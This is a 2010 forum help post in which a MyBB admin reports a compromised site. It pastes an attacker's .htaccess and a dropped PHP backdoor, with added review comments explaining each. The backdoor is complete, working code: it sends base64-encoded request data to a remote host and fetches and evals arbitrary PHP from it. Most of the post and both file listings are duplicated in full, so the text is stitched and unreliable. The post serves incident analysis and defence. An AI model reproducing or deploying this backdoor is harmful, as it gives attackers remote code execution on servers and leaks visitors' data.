2010-02-24, 03:04 PM
I woke up this morning to find my forum was down. After browsing through the files on the server, I noticed the .htaccess file had been changed yesterday, and that there was an additional .htaccess file in the uploads directory.
There was also an odd .php file in the uploads directory - could this have been added by anything other than someone with access to the server? I've pasted what the files looked like below. With these files in place the forum index was not accessible, but after removing them everything seems normal. BTW, I'm running 1.4.9. I'll upgrade to 1.4.11 tonight, but I wanted to share this as it is very strange. I changed all my admin/server passwords after deleting the files.
Was this a hack or something else?
.htaccess file content -----------------------
# REVIEW NOTE: this is the attacker-modified .htaccess as pasted by the poster, not a
# MyBB-shipped file. Every pair of lines repeats "Options -MultiViews" (turns off Apache
# content negotiation) and then points the 404 handler at a different forum script.
# Within one .htaccess a later ErrorDocument for the same status code should override the
# earlier ones, so only the final target (forumdisplay.php) is expected to be in effect;
# the mechanical repetition reads as generated output rather than hand-written config.
# The effect is that any missing URL under this directory is served by a forum script;
# whether that alone explains the index being unreachable cannot be told from this paste.
# Treat the file as part of the compromise: restore .htaccess from a known-good copy and
# compare its mtime with the dropped .php file and the web server access log for that time.
Options -MultiViews
ErrorDocument 404 /forum/showthread.php
Options -MultiViews
ErrorDocument 404 /forum/attachment.php
Options -MultiViews
ErrorDocument 404 /forum/sendthread.php
Options -MultiViews
ErrorDocument 404 /forum/syndication.php
Options -MultiViews
ErrorDocument 404 /forum/printthread.php
Options -MultiViews
ErrorDocument 404 /forum/usercp2.php
Options -MultiViews
ErrorDocument 404 /forum/newreply.php
Options -MultiViews
ErrorDocument 404 /forum/showteam.php
Options -MultiViews
ErrorDocument 404 /forum/private.php
Options -MultiViews
ErrorDocument 404 /forum/search.php
Options -MultiViews
ErrorDocument 404 /forum/reputation.php
Options -MultiViews
ErrorDocument 404 /forum/misc.php
Options -MultiViews
ErrorDocument 404 /forum/calendar.php
Options -MultiViews
ErrorDocument 404 /forum/index.php
Options -MultiViews
ErrorDocument 404 /forum/member.php
Options -MultiViews
ErrorDocument 404 /forum/ratethread.php
Options -MultiViews
ErrorDocument 404 /forum/forumdisplay.php
PHP file content -----------------------------
<? /*
 * REVIEW NOTE: this is not a forum file. It is a dropped remote-code-inclusion backdoor
 * (a "downloader" stub); the single line below does the following, in order:
 *  - error_reporting(0) silences every PHP error so failures never show in logs/output.
 *  - $a..$j collect request metadata: Host, server name, request URI, PHP_SELF, query
 *    string, Referer, User-Agent, client IP, script path and Accept-Language, each with a
 *    fallback to the bare variable name (presumably for register_globals-era hosts).
 *  - $z packs all of that, base64-encoded, into a query string, so every hit on this file
 *    leaks those request details to the remote host.
 *  - $f is then reused as the remote host name; "cnNzbmV3cy53cw==" decodes to
 *    "rssnews.ws". Only when the file is requested directly (basename of the URI equals
 *    basename of the script) AND the "q" request parameter md5-hashes to the hard-coded
 *    value is the host replaced by the "id" parameter. For detection: requests to a file
 *    under uploads/ carrying both "q" and "id" are a strong indicator of operator use.
 *  - The URL prefixes decode to "http://ads.", "http://7." and "http://71." followed by
 *    the host and $z. The code first tries include() on that URL (requires
 *    allow_url_include), then file_get_contents()+eval() (requires allow_url_fopen), then
 *    curl+eval(). Whatever the remote host returns is executed as PHP on this server,
 *    so the payload can change at any time and is never stored on disk.
 *  - die() stops the request afterwards.
 * Containment beyond deleting the file and rotating credentials: deny PHP execution in
 * the uploads directory (e.g. a handler/engine-off rule for that path), disable
 * allow_url_include and, where unused, allow_url_fopen, search the access log for hits on
 * the dropped filename and for the host names above, and diff the whole install against a
 * clean 1.4.9/1.4.11 package since the entry point that wrote these files is not shown here.
 */
error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="e6ef6a96228e594817f7e10d3bb49aef") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>
There was also an odd .php file in the uploads directory - could this have been added by anything other than someone with access to the server? I've pasted what the files looked like below. With these files in place the forum index was not accessible, but after removing them everything seems normal. BTW, I'm running 1.4.9. I'll upgrade to 1.4.11 tonight, but I wanted to share this as it is very strange. I changed all my admin/server passwords after deleting the files.
Was this a hack or something else?
.htaccess file content -----------------------
# REVIEW NOTE: this is the attacker-modified .htaccess as pasted by the poster, not a
# MyBB-shipped file. Every pair of lines repeats "Options -MultiViews" (turns off Apache
# content negotiation) and then points the 404 handler at a different forum script.
# Within one .htaccess a later ErrorDocument for the same status code should override the
# earlier ones, so only the final target (forumdisplay.php) is expected to be in effect;
# the mechanical repetition reads as generated output rather than hand-written config.
# The effect is that any missing URL under this directory is served by a forum script;
# whether that alone explains the index being unreachable cannot be told from this paste.
# Treat the file as part of the compromise: restore .htaccess from a known-good copy and
# compare its mtime with the dropped .php file and the web server access log for that time.
Options -MultiViews
ErrorDocument 404 /forum/showthread.php
Options -MultiViews
ErrorDocument 404 /forum/attachment.php
Options -MultiViews
ErrorDocument 404 /forum/sendthread.php
Options -MultiViews
ErrorDocument 404 /forum/syndication.php
Options -MultiViews
ErrorDocument 404 /forum/printthread.php
Options -MultiViews
ErrorDocument 404 /forum/usercp2.php
Options -MultiViews
ErrorDocument 404 /forum/newreply.php
Options -MultiViews
ErrorDocument 404 /forum/showteam.php
Options -MultiViews
ErrorDocument 404 /forum/private.php
Options -MultiViews
ErrorDocument 404 /forum/search.php
Options -MultiViews
ErrorDocument 404 /forum/reputation.php
Options -MultiViews
ErrorDocument 404 /forum/misc.php
Options -MultiViews
ErrorDocument 404 /forum/calendar.php
Options -MultiViews
ErrorDocument 404 /forum/index.php
Options -MultiViews
ErrorDocument 404 /forum/member.php
Options -MultiViews
ErrorDocument 404 /forum/ratethread.php
Options -MultiViews
ErrorDocument 404 /forum/forumdisplay.php
PHP file content -----------------------------
<? /*
 * REVIEW NOTE: this is not a forum file. It is a dropped remote-code-inclusion backdoor
 * (a "downloader" stub); the single line below does the following, in order:
 *  - error_reporting(0) silences every PHP error so failures never show in logs/output.
 *  - $a..$j collect request metadata: Host, server name, request URI, PHP_SELF, query
 *    string, Referer, User-Agent, client IP, script path and Accept-Language, each with a
 *    fallback to the bare variable name (presumably for register_globals-era hosts).
 *  - $z packs all of that, base64-encoded, into a query string, so every hit on this file
 *    leaks those request details to the remote host.
 *  - $f is then reused as the remote host name; "cnNzbmV3cy53cw==" decodes to
 *    "rssnews.ws". Only when the file is requested directly (basename of the URI equals
 *    basename of the script) AND the "q" request parameter md5-hashes to the hard-coded
 *    value is the host replaced by the "id" parameter. For detection: requests to a file
 *    under uploads/ carrying both "q" and "id" are a strong indicator of operator use.
 *  - The URL prefixes decode to "http://ads.", "http://7." and "http://71." followed by
 *    the host and $z. The code first tries include() on that URL (requires
 *    allow_url_include), then file_get_contents()+eval() (requires allow_url_fopen), then
 *    curl+eval(). Whatever the remote host returns is executed as PHP on this server,
 *    so the payload can change at any time and is never stored on disk.
 *  - die() stops the request afterwards.
 * Containment beyond deleting the file and rotating credentials: deny PHP execution in
 * the uploads directory (e.g. a handler/engine-off rule for that path), disable
 * allow_url_include and, where unused, allow_url_fopen, search the access log for hits on
 * the dropped filename and for the host names above, and diff the whole install against a
 * clean 1.4.9/1.4.11 package since the entry point that wrote these files is not shown here.
 */
error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="e6ef6a96228e594817f7e10d3bb49aef") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>